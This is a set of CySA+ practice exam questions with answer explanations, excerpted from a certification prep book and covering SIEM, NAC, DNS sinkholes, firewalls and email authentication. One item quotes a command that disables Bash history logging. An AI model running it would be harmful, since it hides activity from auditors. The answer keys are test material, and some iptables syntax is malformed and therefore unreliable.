B. User and event or entity behavior analytics (UEBA) captures data about entities and events as well as other security data and performs statistical and other analyses to detect abnormal and unexpected behavior, then alerts administrators so that they can review the information and take appropriate action.

4. The automated malware analysis tool that Jose is using uses a disassembler and performs binary diffing across multiple malware binaries. What information is the tool looking for? A. Calculating minimum viable signature length B. Binary fingerprinting to identify the malware author C. Building a similarity graph of similar functions across binaries D. Heuristic code analysis of development techniques"

C. Binary diffing looks at multiple potentially related binaries that have anti-reverse-engineering tools run on them and looks for similarities. Graphs map this data, helping the tool identify malware families despite the protections that malware authors bake in. As you might have guessed, the rest of the answers for this question were made up." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

24. Charles "wants to use his SIEM to automatically flag known bad IP addresses. Which of the following capabilities is not typically used for this with SIEM devices? A. Blacklisting B. IP reputation C. Whitelisting D. Domain reputation

C. Blacklisting known bad IP addresses, as well as the use of both domain and IP reputation services can help Charles accomplish his task. Whitelisting only allows known addresses through and does not flag known bad addresses." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright

54. Maria is an Active Directory domain administrator for her company, and she knows that a quickly spreading botnet relies on a series of domain names for command and control, and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command and control systems? A. Force a BGP update B. Set up a DNS sinkhole C. Modify the hosts file D. Install an antimalware application

C. Maria can push an updated hosts file to her domain connected systems that will direct traffic intended for known bad domains to the localhost or a safe system. She might want to work with a security analyst or other IT staff member to capture queries sent to that system to track any potentially infected workstations. A DNS sinkhole would only work if all of the systems were using local DNS, and offsite users are likely to have DNS settings set by the local networks they connect to. Antimalware applications may not have an update yet, or may fail to detect the malware, and forcing a BGP update for third-party networks is likely a bad idea.

16. When Pete connects to his organization's network, his PC runs the NAC software his systems administrator installed. The software communicates to the edge switch he is plugged into, which validates his login and system security state. What type of NAC solution is Pete using? A. Agent-based, in-band B. Agentless, in-band C. Agent-based, out-of-band D. Agentless, out-of-band

C. Pete's organization is using an agent-based, out-of-band NAC solution that relies on a locally installed agent to communicate to existing network infrastructure devices about the security state of his system. If Pete's organization used dedicated appliances, it would be an in-band solution, and of course not having an agent installed would make it agentless.

12. Suki notices inbound traffic to a Windows system on TCP port 3389 on her corporate network. What type of traffic is she most likely seeing? A. A NetBIOS file share B. A RADIUS connection C. An RDP connection D. A Kerberos connection

C. RDP operates over TCP 3389. Most corporate workstations won't have RDP turned on inbound to workstations, and Suki may find that she has discovered a compromise or other behavior that her organization may not want to occur." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

37. Matt believes that developers in his organization deployed code that did not implement cookies in a secure way. What type of attack would be aided by this security issue? A. SQL injection B. A denial-of-service attack C. Session hijacking D. XSS

C. Session hijacking of insecurely implemented session cookies is the likely result from this type of issue. Matt should spend time with his developers to ensure that they have reviewed resources like the OWASP guides to secure session creation and maintenance." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

41. Jamal wants to leverage a framework to improve his threat hunting for network defense. What threat hunting framework should he select to help his team categorize and analyze threats more effectively? A. MOPAR B. CVSS C. MITRE ATT&CK D. CAPEC

C. The ATT&CK framework is focused on network defense and broadly covers threat hunting. CAPEC is focused on application security. CVSS is the Common Vulnerability Scoring System, and Mopar is a parts, service, and customer care organization that is part of Fiat Chrysler.

93. "Juliette wants to decrease the risk of embedded links in email. Which of the following solutions is the most common method for doing this? Removing all links in email Redirecting links in email to a proxy Scanning all email using an antimalware tool Using a DNS blackhole and IP reputation list

C. The most common solution to identifying malicious embedded links in email is to use an antimalware software package to scan all emails. They typically include tools that combine IP and domain reputation lists as well as other heuristic and analytical tools to help identify malicious and unwanted links." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

76. While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured: ln /dev/null ~/.bash_history What action was this user attempting to perform? Enabling the Bash history Appending the contents of /dev/null to the Bash history Logging all shell commands to /dev/null Allowing remote access from the null shell"

C. This command will prevent commands entered at the Bash shell prompt from being logged, as they are all sent to /dev/null. This type of action is one reason that administrative accounts are often logged to remote hosts, preventing malicious insiders or attackers who gain administrative access from hiding their tracks." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

35. Manish is using a NAC system and wants to allow users who do not meet admission requirements to patch their machines. What technique should he use to allow this? A. Deny access to the network and require users to connect to a different network to patch before they reconnect B. Build a quarantine network that allows access to update sites and tools C. Deny all access and contact tech support to patch the system D. Allow access and force a reboot after patching

B. Both quarantine networks and captive portals with patch tools and instructions are common solutions to this type of requirement. In this case, placing systems into an isolated quarantine network with access to update and patching sites will meet Manish's needs.

72. Piper wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action? A. #iptables-policy INPUT DROP B. #iptables-policy SERVICE DROP C. #iptables-policy OUTPUT DROP D. #iptables-policy FORWARD DROP"

B. By default, an iptables firewall will have INPUT, OUTPUT, and FORWARD chains. Piper should use the DROP command on all three to stop all traffic to or from a machine.

63. "Latisha wants to ensure that BYOD workstations that connect to her network meet specific minimum operating system patch level requirements. She also wants to place them into the correct VLAN for the user group that the logged-in user belongs to. She is deploying her solution to an existing, complex network. What solution should she recommend? A. Agent-based, in-line NAC B. Agentless, in-line NAC C. Agent-based, out-of-band NAC D. Agentless, out-of-band NAC

D. The key requirements here are that this is an existing network and that the systems are BYOD. That means that Latisha should focus on an agentless system to remove the hurdles that agent-based scanning requires and that an out-of-band solution is likely appropriate since they are easier to retrofit to an existing network than an in-line solution, which can require rearchitecting a network to place the in-line NAC device into a central control location. It is important to note that Latisha will likely have less visibility than she would have with an agent-based system.

28. Fiona wants to prevent email impersonation of individuals inside her company. What technology can help prevent this? A. IMAP B. SPF C. DKIM D. DMARC

D. While SPF and DKIM can help, combining them to limit trusted senders to only a known list and proving that the domain is the domain that is sending the email combine in the form of DMARC to prevent email impersonation when other organizations also DMARC." copyright.